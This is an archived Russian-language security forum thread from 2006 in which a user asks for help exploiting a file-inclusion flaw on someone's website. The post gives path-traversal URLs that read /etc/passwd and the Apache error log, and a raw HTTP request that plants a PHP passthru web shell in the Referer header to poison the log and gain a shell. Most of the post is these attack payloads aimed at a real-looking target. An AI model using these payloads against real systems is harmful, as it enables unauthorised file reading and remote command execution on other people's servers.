ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Помогите разобраться и инклудом!
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Помогите разобраться и инклудом!
  #1  
Старый 11.11.2006, 17:37
MyPoorBrain
Новичок
Регистрация: 09.11.2006
Сообщений: 5
Провел на форуме:
9581

Репутация: 1
Thumbs down Помогите разобраться и инклудом!
Помогите разобраться и инклудом!
Я нашёл вот это:

http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../../../../../../etc/passwd

Пошарил...

http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../usr/local/apache/logs/error_log

Я собирался подконектиться к телнету...
# telnet 127.0.0.1 80
# Trying 127.0.0.1...
# Connected to localhost.
# Escape character is '^]'.
# GET HTTP/1.1
# Accept: */*
# Accept-Language: ru.
# Accept-Encoding: deflate.
# User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
# Host: 127.0.0.1
# Connection: Close
# Referer: http://127.0.0.1/<?passthru($_GET['cmd']);?>
# сдесь мы передали наш кода в поле Referer - на тот случай если фильтруются передоваемые GET-oм параметры сценарием на сервере.

...что бы получить шелл на базе лога. Но у меня, представьте себе, telnet не пашет =). Чо посоветуете?
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ